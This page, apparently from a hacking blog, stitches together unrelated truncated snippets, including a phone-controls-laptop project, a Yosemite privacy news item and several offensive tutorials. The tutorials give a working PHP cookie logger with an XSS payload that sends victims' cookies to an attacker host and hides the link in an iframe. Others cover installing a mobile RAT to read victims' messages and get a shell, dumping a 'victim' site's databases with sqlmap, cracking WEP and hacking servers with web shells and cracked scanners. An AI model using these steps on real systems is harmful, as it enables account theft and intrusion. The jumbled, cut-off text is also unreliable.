Info And World

Introduction It’s always fun to put your programming skills on display. A while back, I figured it’d be cool to try and control my laptop via my Android mobile device. Think about it: being able to play and pause music, start and stop programming jobs or downloads, etc., all by sending messages from your phone. Neat, huh? Before you keep on reading, please bear in mind that this is a pet project, still in its early stages—but the basic platform is there. By gluing together some mainstream tools, I was able to setup my Android phone to control my laptop via a Python interpreter. By the way: the project is open source. You can check out the client code here , and the server code here . The Tool Belt This project involves the following technologies, some of which you may be familiar with, some of which are quite specific to the task at-hand: Python 2.7+ Twisted : an excellent event-driven framework especially crafted for network hackers. Django : I used v1.4

Cookie Grabbing using XSS:- <?php $cookie=$_GET[‘cookie’];     //storing cookies in a variable called $cookie. $file=fopen(“cookies.txt”,”a”);  //opening a file called cookies.txt with append mode. fwrite($file,$cookie.”\n\n\n); fclose($file); ?> Save it as “ 1.php “ ------------------------------------------------ Now the url looks like : www.site.com/some_folder/1.php ----------------------------------------------- Find vuln in a site then put it like this below : http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>  now send this link but,mostly people wont click it because they find this url very suspicious. So u need to mask it ------------------------------------- Ex: <iframe src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(esc

Mac OS X 10.10 Yosemite Sends User Location and Safari Search Data to Apple Apple's latest desktop operating system, known as Mac OS X 10.10 Yosemite , sends location and search data of users without their knowledge to Apple's remote servers by default whenever a user queries the desktop search tool Spotlight, which questions users' privacy once again. The technology firm faced criticism on Monday when users came to know about the company's About Spotlight & Privacy which clearly states that anyone who uses the Spotlight feature in either Mac OS X 10.10 Yosemite or its newly launched mobile operating system iOS 8 will have their location and search information passed back to Apple's servers to process. APPLE COLLECTS USERS' DATA AND FORWARDS IT TO MICROSOFT AS WELL On one hand, where Apple decided to enable hard drive encryption by default, despite the FBI requests not to do so. But on the other, the company is itse

Today, i’m talking about how to hack any Android, iPhone and Blackberry mobile phone. Recently, i posted how to download, install run backtrack 5 in windows.  Works a lot like your regular RAT. You configure an Xampp server on your computer and once people install your app you can control them from your own phone. You can read all there messages, contacts and get shell access. Requirements: 1. Backtrack 5 r3 (using backtrack for this example as SPF is pre-installed), i recently posted a article, how to download, install and run backtrack 5 in windows . 2. Portforwarding (if you are using this outside of your own network) 3. Xampp for linux (guide to installing this will be in the tutorial) 4. A phone (for example I will be using my Android Phone) Step 1) Installing Xampp: First of all, go Here to get Xampp. Once xampp has finished downloading, go to your home directory and you should have a file called “ download.php?xampp-linux-1.7.3a.tar.gz ” rename it to

Rooting your Android #su TryNotToBreakAnything.sh We've talked a lot about root and Android in the past five years. We've discussed the good , we've discussed the bad . We'll keep talking about both, because root on Android, like Android itself, is a constantly evolving thing. As Android matures, the wide-open style of root access we may have grown used to with legacy versions has gone away . Because Android is designed for mobile devices, the focus is on security — specifically the security of your life's data you might have stored away on that screen in your pocket. We've seen Android go from the wild-west days of unfettered Superuser access, to locked down and tamper-proof (well, they try to be) devices meant for folks who need the extra level for their business details. For some of us, this is a hinderance and we don't want Google or the folks who made our phone trying to protect us from ourselves. But for each pers

1. Memory Note: The way I describe it here, memory for a process is organized on most computers, however it depends on the type of processor architecture. This example is for x86 and also roughly applies to sparc. The principle of exploiting a buffer overflow is to overwrite parts of memory which aren't supposed to be overwritten by arbitrary input and making the process execute this code. To see how and where an overflow takes place, lets take a look at how memory is organized. A page is a part of memory that uses its own relative addressing, meaning the kernel allocates initial memory for the process, which it can then access without having to know where the memory is physically located in RAM. The processes memory consists of three sections: - code segment, data in this segment are assembler instructions that the processor executes. The code execution is non-linear, it can skip code, jump, and call functions on certain conditions. Therefore, we have a po

Metasploit Terms Exploit – to take advantage of a security flaw within a system, network, or application. Payload  – is code that our victim computer to execute by the metasploit framework. Module  – a small piece of code that can be added to the metasploit framework to execute an attack. Shellcode – a small piece of code used as a payload. MSFconsole Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch attacks, creating listeners, and much, much more. We will be using Msfconsole throughout these tutorials, but mastering it will allow you to keep up with metaspolits rapidly changing framework. Metasploit comes installed by default on backtrack 5. To access msfconsole, open your console and type: root@bt: ~# cd /opt/framework3/msf3/ root@bt: ~#/opt/framework3/msf3# msfconsole After sometime, the msfconsole will boot. To view the help files, simply type help followed by the command you want to know more

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal 2. Now find the vulnerable site. (well I already have vulnerable site) 3. Now type this command in the terminal and hit enter.(refer above figure) python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs 4. Now you will get the database name of the website Well I got the two database aj and information_schema we will select aj database. 5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter. python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables 6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter. python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables 7. Now you will get the tables list which is stored i

Description Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection. When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection , the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible. . Threat Modeling Same as for SQL Injection Risk Fa

Create a new virtual machine like i have created...!!!    press enter ......go on  At BOOT Menu....just type startx an Now y our all set to go... just simply follow below steps...now   Rules to Follow A Backtrack Live CD : the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. here a link to download it http://www.backtrack-linux.org/downloads I highly recommend you to download backtrck 32 bit version coz it runs smoothly...in win7 64bit through vmware workstation.......... / A nearby WEP-enabled Wi-Fi network  Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                              S

How to Hack a Server Everything you need to know…. Tools you need: - Backtrack ( Backtrack Website ) - Firefox (get it from here…. ) – Included in Backtrack and Ubuntu - Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here…. - iCon2PHP (Get it from here…. ) - A good shell (iCon2PHP Archive includes three great shells) - A good VPN or Tor (More explanation below…..) - Acunentix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net ) About the Tools: Backtrack – Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers. ( Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet) Firefox – Firefox is the best browser for hacking. You can easily configure a proxy